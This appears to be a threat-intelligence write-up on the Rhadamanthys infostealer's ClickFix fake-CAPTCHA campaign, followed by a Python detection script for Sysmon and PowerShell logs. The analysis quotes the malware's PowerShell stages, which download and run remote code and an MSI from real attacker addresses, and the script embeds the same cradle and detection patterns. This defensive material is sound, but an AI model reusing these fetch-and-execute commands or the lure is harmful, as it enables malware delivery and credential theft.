Rhadamanthys Infostealer Leveraging ClickFix Technique to Steal Login Credentials
Rhadamanthys first surfaced in 2022 as a modular stealer sold under the Malware-as-a-Service model, but its latest campaign shows how quickly it is innovating.
At the centre of the new wave is a booby-trapped CAPTCHA page dubbed ClickFix, which instructs victims to “verify” their session by pasting a PowerShell command.
Once executed, the command silently reaches out to hxxps://ypp-studio[.]com/update.txt, turns off execution-policy safeguards and fetches the next-stage payload in memory, staying fileless until the final drop.
Dark Atlas analysts noted that the lure pages are hosted on freshly registered typosquats, often imitating YouTube Partner Studio or similar SaaS portals, and that the underlying infrastructure has migrated from the earlier 77.239.96.51/rh_0.9.0.exe host to 62.60.226.74/PTRFHDGS.msi.
This subtle shift breaks hard-coded IoCs used by many security tools while preserving the stealer’s delivery chain.
Campaign telemetry shows a significant uptick in infections across small-to-medium enterprises during June and early July 2025, with stolen browser cookies and cloud credentials appearing on dark-web markets within hours of compromise.
What makes ClickFix especially potent is its social-engineering layer. The CAPTCHA screen offers a fake sense of legitimacy while precisely guiding the victim to press Win + R, paste the command, and hit Enter.
Because the victim, not an attachment, executes the code, the lure never passes through e-mail gateway filters and involves none of the Office macros most blue teams hunt for.
By the time a user sees the reassuring “Verification complete!” pop-up, Rhadamanthys has already unpacked in the background and begun siphoning data to its C2 at 193.109.85.136.
Infection Mechanism
The initial PowerShell command is heavily padded with hash symbols (PowerShell line comments) to evade string-based detectors, yet resolves into only two functional lines:
# Stage 1 – clipboard payload
$u='hxxps://ypp-studio[.]com/update.txt'; (New-Object Net.WebClient).DownloadString($u) | iex
# Stage 2 – decoded from Stage 1
Invoke-WebRequest -Uri http://62.60.226.74/PTRFHDGS.msi -OutFile $env:AppData+'PTRFHDGS.msi';
Start-Process msiexec.exe -ArgumentList '/i', $env:AppData+'PTRFHDGS.msi';
Stage 1 lives only in memory; Stage 2 writes the MSI installer as PTRFHDGS.msi, which drops rh_0.9.0.exe and launches it under msiexec so that the parent/child relationship looks like a routine installation.
The executable immediately enumerates running processes, hunting for debuggers and analysis tools such as x64dbg.exe, ida64.exe or ProcessHacker.exe; if any is found, it terminates itself to frustrate analysis.
It follows with timing-based anti-sandbox checks using QueryPerformanceCounter, then injects into WerFault.exe, the trusted Windows Error Reporting binary, to persist and exfiltrate.
A single TCP stream to the hard-coded IP carries compressed archives containing browser databases, crypto-wallet files and KeePass vaults.
Screenshots captured via BitBlt are appended, giving operators a real-time window into victim activity.
Since Rhadamanthys resolves its C2 by literal IP, DNS-layer defences see nothing, and TLS on port 443 blends with normal traffic. The flip side is that a TLS session to a bare IP address that no DNS query on the host ever returned is itself an anomaly that network telemetry can surface.
The ClickFix campaign underscores how effortlessly adversaries can fuse social engineering with low-friction LOLBins to bypass layered defences.
Updating signature-based rules to include execution-policy bypasses, monitoring child processes of msiexec.exe, and alerting on PowerShell launched from the Win + R Run dialog with a download cradle on its command line are immediate steps defenders should consider.
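The following is an added detection example written for this write-up; it is not code from the original article or from Dark Atlas. It replays constructed Sysmon and PowerShell script-block events through the checks recommended above and in the Infection Mechanism section: unpadding a hash-filled script, spotting a download cradle spawned from the Run dialog, flagging executables parented by msiexec.exe, matching the quoted IoCs, and catching TLS to an IP that no DNS answer ever returned. Field names follow Sysmon EID 1/3/22 and PowerShell EID 4104; the event contents, file paths and the 203.0.113.10 address are assumptions.

```python
"""Replays constructed Sysmon/PowerShell-log events through the ClickFix ->
Rhadamanthys detections described in the article. Added example; IoCs are
the ones quoted in the text, everything else (paths, 203.0.113.10) is assumed."""
import ipaddress
import re

IOC_IPS = {"77.239.96.51", "62.60.226.74", "193.109.85.136"}
IOC_DOMAINS = {"ypp-studio.com"}
IOC_FILES = {"ptrfhdgs.msi", "rh_0.9.0.exe"}
# Download-cradle / policy-bypass tokens seen in the Stage 1 and Stage 2 lines
CRADLE = re.compile(
    r"downloadstring|invoke-webrequest|invoke-expression|\biex\b|\biwr\b"
    r"|-e(?:p|xecutionpolicy)\s+bypass", re.I)


def refang(text: str) -> str:
    """Turn defanged IoCs (hxxps, [.]) back into the form seen in telemetry."""
    return text.replace("hxxp", "http").replace("[.]", ".")


def strip_hash_padding(script: str) -> str:
    """Drop '#' comment padding and return only the functional lines.
    PowerShell opens a line comment at '#' only where a token begins (line
    start, after whitespace or ';') and never inside quotes, so 'a#b' and
    URLs survive. Assumption: the lure uses line comments, not <# #> blocks."""
    kept = []
    for line in script.splitlines():
        quote, cut = None, len(line)
        for i, ch in enumerate(line):
            if quote:
                quote = None if ch == quote else quote
            elif ch in "'\"":
                quote = ch
            elif ch == "#" and (i == 0 or line[i - 1] in " \t;"):
                cut = i
                break
        line = line[:cut].strip()
        if line:
            kept.append(line)
    return "\n".join(kept)


def find_iocs(text: str) -> set:
    low = refang(text).lower()
    return {ioc for ioc in IOC_IPS | IOC_DOMAINS | IOC_FILES if ioc in low}


def _base(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def detect(events: list) -> list:
    """Return (rule, detail) pairs. IPs returned by DNS queries are remembered
    so a later TLS connection to an address no query produced can be flagged
    as literal-IP C2, the DNS blind spot the article describes."""
    resolved, hits = set(), []
    for ev in events:
        eid = ev.get("EventID")
        if eid == 22:  # Sysmon DnsQuery
            for ans in ev.get("QueryResults", "").split(";"):
                ans = ans.strip().removeprefix("::ffff:")
                if ans:
                    resolved.add(ans)
            if ev.get("QueryName", "").lower() in IOC_DOMAINS:
                hits.append(("ioc_domain", ev["QueryName"]))
        elif eid == 1:  # Sysmon ProcessCreate
            image, parent = _base(ev.get("Image", "")), _base(ev.get("ParentImage", ""))
            cmd = ev.get("CommandLine", "")
            # Win+R paste: explorer.exe is the parent of the pasted cradle
            if image in ("powershell.exe", "pwsh.exe") and parent == "explorer.exe" and CRADLE.search(cmd):
                hits.append(("run_dialog_cradle", image))
            # an installer should not be the parent of a fresh executable
            if parent == "msiexec.exe" and image != "msiexec.exe":
                hits.append(("msiexec_child", image))
            hits += [("ioc_cmdline", i) for i in sorted(find_iocs(cmd))]
        elif eid == 4104:  # PowerShell script block logging (full script text)
            functional = strip_hash_padding(ev.get("ScriptBlockText", ""))
            if CRADLE.search(functional):
                hits.append(("padded_cradle", functional.splitlines()[0]))
            hits += [("ioc_script", i) for i in sorted(find_iocs(functional))]
        elif eid == 3:  # Sysmon NetworkConnect
            ip, port = ev.get("DestinationIp", ""), int(ev.get("DestinationPort", 0))
            if ip in IOC_IPS:
                hits.append(("ioc_c2", ip))
            if ip and port == 443 and ip not in resolved and ipaddress.ip_address(ip).is_global:
                hits.append(("tls_literal_ip", f"{_base(ev.get('Image', ''))} -> {ip}"))
    return hits


PADDED_STAGE1 = (  # constructed stand-in for the hash-padded clipboard payload
    "######## human verification ########\n"
    "$u='hxxps://ypp-studio[.]com/update.txt'; ##########\n"
    "####################################\n"
    "(New-Object Net.WebClient).DownloadString($u) | iex ####\n"
)

SAMPLE_EVENTS = [  # constructed for this example, not real telemetry
    {"EventID": 1, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "powershell -w hidden -ep bypass -c \"iex (New-Object Net.WebClient)"
                    ".DownloadString('https://ypp-studio.com/update.txt')\""},
    {"EventID": 4104, "ScriptBlockText": refang(PADDED_STAGE1)},
    {"EventID": 22, "QueryName": "ypp-studio.com", "QueryResults": "::ffff:203.0.113.10;"},
    {"EventID": 3, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "DestinationIp": "203.0.113.10", "DestinationPort": 443},  # resolved via DNS, not literal-IP
    {"EventID": 1, "Image": r"C:\Users\v\AppData\Roaming\rh_0.9.0.exe",
     "ParentImage": r"C:\Windows\System32\msiexec.exe",
     "CommandLine": r"C:\Users\v\AppData\Roaming\rh_0.9.0.exe"},
    {"EventID": 3, "Image": r"C:\Windows\System32\WerFault.exe",
     "DestinationIp": "193.109.85.136", "DestinationPort": 443},
]

if __name__ == "__main__":
    for rule, detail in detect(SAMPLE_EVENTS):
        print(f"{rule:18} {detail}")
```

The literal-IP rule is deliberately the noisiest of the four: hosts with a warm DNS cache or connections to CDN anycast addresses will trip it, so in production it should be correlated with a longer DNS history and an allowlist rather than alerted on alone. The other rules carry the IoCs only as a secondary signal; the behavioural checks (explorer.exe parenting a cradle, msiexec.exe parenting a dropped executable) are what survive the kind of infrastructure rotation described earlier in the article.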
Yet the broader lesson is behavioural: any “verification” prompt that asks users to run code is suspect—especially when the only thing it fixes is the attacker’s foothold.